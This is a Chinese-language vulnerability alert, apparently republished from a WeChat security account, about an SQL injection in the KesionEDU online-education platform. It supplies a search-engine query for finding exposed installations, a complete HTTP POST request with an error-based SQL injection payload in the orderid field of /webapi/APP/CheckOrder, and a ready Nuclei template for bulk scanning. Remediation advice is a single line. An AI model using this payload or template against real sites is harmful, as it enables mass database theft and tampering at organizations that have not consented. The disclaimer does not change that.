0x01 产品简介
科汛网校KesionEDU是KESION科汛开发的在线教育建站系统,支持在线直播教学、课程点播、录播授课等多种教学方式,满足不同场景下的教学需求。提供问答互动、学习点评、在线笔记等功能,增强学员与教师之间的互动交流。拥有在线考试系统,支持单选、多选、问答等多种题型,方便学员进行课后测练和考试。供求职招聘功能,方便教育机构网罗各地人才,增强平台吸引力。提供全方位的技术支持和售后服务,确保教育机构在使用过程中无后顾之忧。是教育机构搭建在线教育平台的理想选择,利用测绘引擎搜索发现影响资产1100+。
POC在末尾下载
请自行搭建环境进行漏洞测试,该公众号或作者星球分享的工具、项目、漏洞仅供安全研究与学习之用请勿用于非法行为,如用于其他用途,由使用者承担全部法律及连带责任,与作者和本公众号无关。
TIPS: 末尾领取资料及福利-批量检测脚本在末尾
0x02 漏洞描述
SQL注入被广泛用于非法入侵网站服务器,获取网站控制权。它是应用层上的一种安全漏洞。通常在设计存在缺陷的程序中,对用户输入的数据没有做好过滤,导致恶意用户可以构造一些SQL语句让服务器去执行,从而导致数据库中的数据被窃取,篡改,删除,以及进一步导致服务器被入侵等危害。
0x03 Zoomeye语法
http.body="/KS_Inc/static/edu"
0x04 漏洞复现
request packet(NucleiPOC在末尾)
POST /webapi/APP/CheckOrder HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Connection: close Content-Length: 242 Accept: application/json, text/javascript, */*; q=0.01 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Priority: u=0 X-Requested-With: XMLHttpRequest {"orderid":"1' AND 7755 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (7755=7755) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(113)))-- Ahbw","apptoken":"1","ordertype":"1"}
Nuclei批量检测POC(末尾有Nuclei批量检测POC)
0x05 修复建议
关闭互联网暴露面或接口设置访问权限,官方已经推出新版本,建议升级到最新版。
Nuclei-YamlPoc
id: KesionEDU-CheckOrder-SQLi info: name: KesionEDU-CheckOrder-SQLi author: HK severity: high metadata: fofa-query: body="/KS_Inc/static/edu" http: - raw: - | POST /webapi/APP/CheckOrder HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0 Accept: application/json, text/javascript, */*; q=0.01 Priority: u=0 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest {"orderid":"1' AND 7755 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (7755=7755) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(113)))-- Ahbw","apptoken":"1","ordertype":"1"} matchers-condition: and matchers: - type: word words: - "qkpzq1qqkkq" - type: status status: - 500
原文始发于微信公众号(渗透安全HackTwo):EDU-Kesion科汛开发的在线教育建站系统存在SQL注入漏洞 (大量存在含POC新接口) | 漏洞预警
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论